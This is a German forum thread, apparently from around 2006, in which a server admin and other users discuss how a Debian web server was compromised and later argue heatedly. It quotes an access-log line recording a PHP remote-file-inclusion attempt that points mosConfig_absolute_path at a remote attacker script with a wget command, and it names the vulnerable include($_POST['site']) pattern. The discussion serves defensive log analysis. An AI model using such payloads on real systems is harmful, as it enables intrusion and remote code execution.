www-data hacked

[Joe User]

aber wenn du kein deutsch kannst ...

http://www.rootforum.org/forum/viewtopic.php?t=29261

So und nun wieder back to topic!

[mattiass]

Ansonsten bei selbsterstellter Webseite ist öfter mal ein include($_POST['site']) zu finden.

Seltener POST als häufiger $_GET['document']...

Dann macht es Sinn, im AccessLog nach 'document=http' zu greppen, selbstverständlich auch nach dem entsprechenden Äquivalent als 'escapetem' GET-String, also irgendwas wie 'document=%12%34%56%78' (die entsprechenden ASCII-Werte bitte selbst rausdröseln.

Damit wären wir wieder beim Thema und können uns weitere Diskussionen über krasse Firewallregeln in Kleinbuchstaben ersparen.

Wer hier anderen Postern vorwirft, kein Deutsch zu können, sollte sich selbst mal fragen, wozu Großbuchstaben da sind. Die Antwort: Sie kennzeichnen Satzanfänge und Substantive und erleichtern dadurch die Lektüre. Denk mal drüber nach!

[tcsoft]

schon mal was von iptables gehört?

lol, ja ich habe was von iptables gehört :D :D (habe sogar ein BUCH darüber :D)

um das mal zu klären: ich befinde mich durchaus auf einem fortgeschrittenen linux-niveau, nur kenne ich mich bei server-lücken und attacken nicht aus - für das gibts ja auch spezies.
außerdem habe ich iptables ordnungsgemäß konfiguriert (bestimmte ports offen und sonst ALLES DROP).

stateful-firewalling zu spielen und nur established/related-pakete durchzulassen wäre nicht in meinem sinne - verwende den server auch zum saugen (wie würde ich dann mit apt-get updates einspielen???)

da ich php nicht gechrootet laufen haben will, befasse ich mich nun mal mit dem safe_mode (der zwar in php6 abgeschafft wird aber bis dahin ists ne passable lösung)

@rootsrv: ich verwende die aktuelle version von debian-sarge stable (6.4-1sarge3). sollte ja dicht sein, wird ja von debian-security immer gepatched - oder? :?:

Ansonsten bei selbsterstellter Webseite ist öfter mal ein include($_POST['site']) zu finden

hehe, nein. auch wenn ich faul bin - minimaleingabeprüfung mache ich schon :D

ich muss zugeben, awstats ist öffentlich zugänglich. könnte evtl. eine lücke sein - werde ich schließen.

von squirrelmail hab ich eine eher ältere version drauf - 1.4.6

EDIT: danke, MattiasS bringt hier echt gute, hilfreiche und kompetente Lösungsansätze (auch JoeUser ist sehr hilfreich). Vielen Danke vorerst mal.

[superdreadnought]

So und nun wieder back to topic!

^^ gute idee.

@topic: hast du inzwischen mal dein logs durchsucht und die schwachstelle gefunden?

[mattiass]

von squirrelmail hab ich eine eher ältere version drauf - 1.4.6

Möglicherweise eine Schwachstelle durch eine geforgte Mail?

[tcsoft]

in den logs find ich für das stichwort "wget" nur so sachen wie

Code: Select all

access.log.1:213.215.135.124 *MY-IP-ADDRESS* - [27/Oct/2006:14:50:46 +0200] "GET http://*MY-IP-ADDRESS*/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sanwall.by.ru/cmd/CMD.gif?&cmd=wget HTTP/1.0" 404 25

nur dass in dem ordner keine index.php liegt :D

@MattiasS
geforgte mail?? was ist das :?:

[mattiass]

@MattiasS
geforgte mail?? was ist das :?:

Eine Mail, mit der bei der Verarbeitung einer Mail oder beim Anklicken eines Links eine Lücke im Webmailer ausgenutzt werden soll. Es gab da gelegentliche Schwachstellen in Squirrelmail. Wenn Du intensive Squirrelnutzer hast, könnte es sein, dass solch eine Mail das Nachladen des Schadcodes veranlasst hat.

Ich weiss nicht, wie stark solche Angriffe auf Squirrel in der Praxis gefahren wurden...

[tcsoft]

verstehe, kann durchaus passiert sein.

hab im log noch einige andere, auf meine site-struktur adaptierte, angriffsversuche gefunden. vorwiegend auf "index.php?page=http://bla" - dagegen bin ich aber safe.

[superdreadnought]

in den logs find ich für das stichwort "wget" nur so sachen wie

Code: Select all

access.log.1:213.215.135.124 *MY-IP-ADDRESS* - [27/Oct/2006:14:50:46 +0200] "GET http://*MY-IP-ADDRESS*/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sanwall.by.ru/cmd/CMD.gif?&cmd=wget HTTP/1.0" 404 25

^^ auf der seite findet man interessante sachen ...

da ist man doch froh, dass es secure globals und den safe mode gibt (ich vermute mal, du hattest die an, oder?).

[Roger Wilco]

^^ auf der seite findet man interessante sachen ...

Nichts, was man nicht schon von X anderen Seiten kennt.

da ist man doch froh, dass es secure globals und den safe mode gibt (ich vermute mal, du hattest die an, oder?).

Hätte auch nichts gebracht. Der zitierte Request hat ja sowieso einen Error 404 generiert. Davon abgesehen ist der safe_mode kaputt[tm] und register_globals deaktivieren macht nicht automatisch alle Skripte sicher.

[tcsoft]

da ist man doch froh, dass es secure globals und den safe mode gibt (ich vermute mal, du hattest die an, oder?).

hehe, da muss ich dich auf diesen thread verweisen http://www.rootforum.org/forum/viewtopic.php?p=271955

versuche schon den ganzen tag den sch**** safe_mode zum laufen zu bekommen. :?

EDIT:

safe_mode kaputt

wie meinst du das? (dass es nicht das gelbe vom security-ei ist, das ist klar)

[superdreadnought]

das ist ja sehr eigenartig. aber nochmal zurück zu den secure globals, sind die an?



edit: upps, kann sein, dass des nur globals heißt, ich stell das mal klar ...
edit2:

Code: Select all

register_globals = Off

[/i]

[tcsoft]

ja die sind ja sowieso off. safe_mode war ja auch immer on => nur hab bis jetzt nicht gemerkt, dass er nicht greift!!! 8O

[mattiass]

ja die sind ja sowieso off. safe_mode war ja auch immer on => nur hab bis jetzt nicht gemerkt, dass er nicht greift!!! 8O

Naja, safe_mode ist auch kein Wundermittel.

Was den kompromitierten Server angeht: you get what you pay for. Freunde sind OK, wenn es um einmalige Hilfen bei der Einrichtung etc. geht, aber definitiv der falsche Weg, für eine regelmäßige Betreuung und Sicherheitsupdates innerhalb weniger Stunden.

Der Aufwand für Updates ist nicht exorbitant. Du solltest bereits für den Differenzbetrag zwischen Rootserver und Managed Server jemanden bekommen, der die Sicherheitsupdates und Backups durchführt, sowie die informiert, wenn es auf das Ende eines Support-Zeitraumes zugeht. Er wird Dir auch bei der Migration alter Anwendungen auf neue Betriebssysteminstanzen helfen.

Neben den genannten Anlaufstellen ist die lokale Linux User Group oft ein informeller Marktplatz für derartige Aufträge, frage einfach den Leiter der LUG, ob er bereit wäre, seine Mitglieder mal auf Deine Adminsuche anzusprechen...

[tcsoft]

ähm ja....
einspielen von sicherheitsupdates - das schaff ich alleine auch (sind ja recht wenig standard-php-applikationen drauf) und ein apt-get update/upgrade schaffe ich auch hin und wieder wenn ich zeit habe (täglich) :D :D :D
die paar security-anregungen kann ich mir auch so holen, OHNE dass ich so einen "Bims" engagiere (der im Endeffekt mehr kostet als er Nutzen hat)

[codc]

ähm ja....
einspielen von sicherheitsupdates - das schaff ich alleine auch (sind ja recht wenig standard-php-applikationen drauf) und ein apt-get update/upgrade schaffe ich auch hin und wieder wenn ich zeit habe (täglich) :D :D :D
die paar security-anregungen kann ich mir auch so holen, OHNE dass ich so einen "Bims" engagiere (der im Endeffekt mehr kostet als er Nutzen hat)

Wohl nicht ansonsten wäre dein Startposting überflüssig. DU hast es nicht geschafft die Kiste sicher zu halten. Ein Profi (aka Bims wie du es sagt) denke ich hätte es.

Das ganze zeigt nur was du für eine geringe Meinung von Leuten hast die sich damit auskennen. Ich bin kein IT-Profi sondern nur Admin von 3 Firmenservern und das neben meinem eigendlichen Job aber so was kotzt mich an ehrlich gesagt wenn ich so was lese. Ich habe jetzt 5 Jahre mit Linux auf Servern zu tun und hab mal aus Spass LPIC-1 gemacht und will auf dem LT LPIC-2 machen und bin immer noch erstaunt wie wenig ich eigendlich weiss. Aber noch keiner von mir betreuten Server ist je erfolgreich angegriffen worden.

[bjunix]

Ich bin der Meinung, dass du doch etwas mehr machen musst als nur das täglich apt-get {update|upgrade}. Zumindest solltest du Menschen, die sich professionell mit Server-Systemen auseinanderstetzen, nicht als "Bims" (was immer das heissen mag) abtuen solltest.

[tcsoft]

Wohl nicht ansonsten wäre dein Startposting überflüssig. DU hast es nicht geschafft die Kiste sicher zu halten. Ein Profi (aka Bims wie du es sagt) denke ich hätte es.

Das ganze zeigt nur was du für eine geringe Meinung von Leuten hast die sich damit auskennen. Ich bin kein IT-Profi sondern nur Admin von 3 Firmenservern und das neben meinem eigendlichen Job aber so was kotzt mich an ehrlich gesagt wenn ich so was lese. Ich habe jetzt 5 Jahre mit Linux auf Servern zu tun und hab mal aus Spass LPIC-1 gemacht und will auf dem LT LPIC-2 machen und bin immer noch erstaunt wie wenig ich eigendlich weiss. Aber noch keiner von mir betreuten Server ist je erfolgreich angegriffen worden.

jaja, passt schon wieder. für MEINE bedürfnisse auf DIESEM server brauche ICH keinen Linux-Security-Freak à 25Euro/h :D
"Bims" war in diesem zusammenhang so gemeint: Wegen jedem Schas (kannst du selbst nachgoogeln was das in österreich bedeutet) muss ich nicht gleich einen Profi engagieren.
ps: ich habe durchaus achtung vor leuten die sich wirklich auskennen :!:

kann vll jemand diesen thread schließen - das ganze gehört doch nicht mehr zum thema :)

[elch_mg]

zu MEINEN Bedürfnissen die DEINEN Server betreffen gehört, dass er keinen Spam (o.ä.) an MEINEN Server versendet, weil DU keinen Linux-Security-Freak benötigst, der mehr als apt-get update/upgrade kann.

Immer diese Ösen. *SCNR*

[djcrackman]

@elch Das nimmst du bitte zurück, ich kann nichts dafür, dass der Landsmann über mir einen an der Klatsche hat.

@tcsoft Ich bin Österreicher, erzähl mal, was soll Bims denn bedeuten, hm?

@Topic Ich bin nach wie vor dafür, dass Pseudo-Admins genauso aus dem Verkehr gezogen werden, wie es auch mit Alkolenkern passiert. Vernünftige Geldstrafen austeilen, mal sehen welcher 12 Jährige sich dann noch einen Root holt. Weihnachten (und somit fast 3 Wochen Ferien) kommen auf uns zu - es wird wieder schrecklich mit den Spamschleudern *grml*.

[Joe User]

Genug geflamed -> *closed*